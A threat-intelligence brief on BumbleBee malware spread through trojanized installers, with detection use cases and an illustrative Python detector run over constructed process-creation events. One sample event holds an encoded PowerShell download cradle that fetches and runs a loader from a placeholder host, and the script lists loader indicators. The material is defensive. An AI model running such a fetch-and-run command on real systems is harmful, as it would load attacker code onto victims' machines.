2023-05-15

BumbleBee Malware Found in Disguised Software


Category: Malware Campaign | Industry: Global | Level: Tactical | Source: Secureworks

Threat actors distributing malware through Google Ads or SEO poisoning commonly rely on bundling the software a user wants with the payload the user does not. Secureworks' analysis found BumbleBee malware being spread through "trojanized installers for popular software such as Zoom, Cisco AnyConnect, ChatGPT, and Citrix Workspace." Secureworks has tracked this campaign since February 16, 2023, when it identified a fake Cisco AnyConnect download page. "An infection chain that began with a malicious Google Ad sent the user to this fake download page via a compromised WordPress site," said Secureworks.

Once the trojanized installer is run, a legitimate copy of the software is installed from an MSI installer file, but the installation also launches a malicious PowerShell script that loads BumbleBee into memory. Because BumbleBee is modular, it can fetch additional payloads for data collection and ransomware deployment. In one intrusion Secureworks observed, the threat actors downloaded remote access software three hours after gaining initial access, then used it to move laterally, collect system data and credentials, and ultimately deploy ransomware.

Anvilogic Scenario:

  • Malicious Software Download via MSI/JS

Anvilogic Use Cases:

  • MSIExec Install MSI File
  • Executable Create Script Process
  • Known Malicious PowerShell Cmdlet
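As an added example (not Secureworks' findings and not Anvilogic's detection content), the following Python applies the three use cases above, plus the scenario-level correlation, to constructed Sysmon Event ID 1-style process-creation records that mirror the chain described in the write-up: msiexec.exe installing an MSI, then spawning powershell.exe with an encoded command that contains a download cradle. The sample events, the indicator token list, and the rule names are assumptions for illustration.

```python
import base64
import re
from collections import defaultdict

# Script hosts a quiet MSI install should not normally need to launch.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Download-cradle / in-memory-loader indicators. Illustrative assumption only,
# not Secureworks' or Anvilogic's actual signature content.
SUSPICIOUS_TOKENS = [
    "iex", "invoke-expression", "downloadstring", "downloadfile",
    "frombase64string", "reflection.assembly", "virtualalloc",
    "net.webclient", "invoke-webrequest",
]


def _b64_ps(script):
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode()


# Constructed Sysmon Event ID 1-style records (pid, ppid, image, command line). Not real telemetry.
EVENTS = [
    {"pid": 4120, "ppid": 1300, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\alice\Downloads\anyconnect-setup.msi" /qn'},
    {"pid": 4188, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -ep bypass -enc " + _b64_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://update.example.invalid/loader.ps1')")},
    {"pid": 4201, "ppid": 1300, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Temp\7zip.msi" /quiet'},
    {"pid": 4350, "ppid": 900,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1"},
]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand/-enc/-ec/-e payload if present, else the raw command line."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\b\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def suspicious_tokens(cmdline):
    """Indicators found in the (decoded) PowerShell command line, in SUSPICIOUS_TOKENS order."""
    decoded = decode_encoded_command(cmdline).lower()
    return [t for t in SUSPICIOUS_TOKENS if t in decoded]


def detect(events):
    """Map pid -> list of use-case rule names that fired for that process."""
    by_pid = {e["pid"]: e for e in events}
    findings = defaultdict(list)
    for e in events:
        img = _basename(e["image"])
        parent = by_pid.get(e["ppid"])
        # Use case: MSIExec Install MSI File (/i or /package switch present)
        if img == "msiexec.exe" and re.search(r"\s/(?:i|package)\b", e["cmdline"], re.IGNORECASE):
            findings[e["pid"]].append("msiexec_install_msi")
        # Use case: Executable Create Script Process (installer spawning a script host)
        if parent and _basename(parent["image"]) == "msiexec.exe" and img in SCRIPT_HOSTS:
            findings[e["pid"]].append("installer_spawned_script_host")
        # Use case: Known Malicious PowerShell Cmdlet, checked after decoding -enc
        if img in {"powershell.exe", "pwsh.exe"} and suspicious_tokens(e["cmdline"]):
            findings[e["pid"]].append("known_malicious_powershell_cmdlet")
    return dict(findings)


def scenario_hits(events, findings):
    """Scenario correlation: an MSI install whose child script host runs loader cmdlets.
    Returns (installer_pid, script_host_pid) tuples."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for pid, rules in findings.items():
        if "installer_spawned_script_host" in rules and "known_malicious_powershell_cmdlet" in rules:
            parent_pid = by_pid[pid]["ppid"]
            if "msiexec_install_msi" in findings.get(parent_pid, []):
                hits.append((parent_pid, pid))
    return hits


if __name__ == "__main__":
    found = detect(EVENTS)
    for pid, rules in found.items():
        print(pid, rules)
    print("scenario:", scenario_hits(EVENTS, found))
```

Decoding the encoded command before matching is the important step: an `-enc` payload hides `IEX` and `DownloadString` from any rule that only inspects the raw command line. The benign 7-Zip install and the scheduled inventory script each trigger at most one use case, and only the msiexec-to-PowerShell pair is promoted to the scenario.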
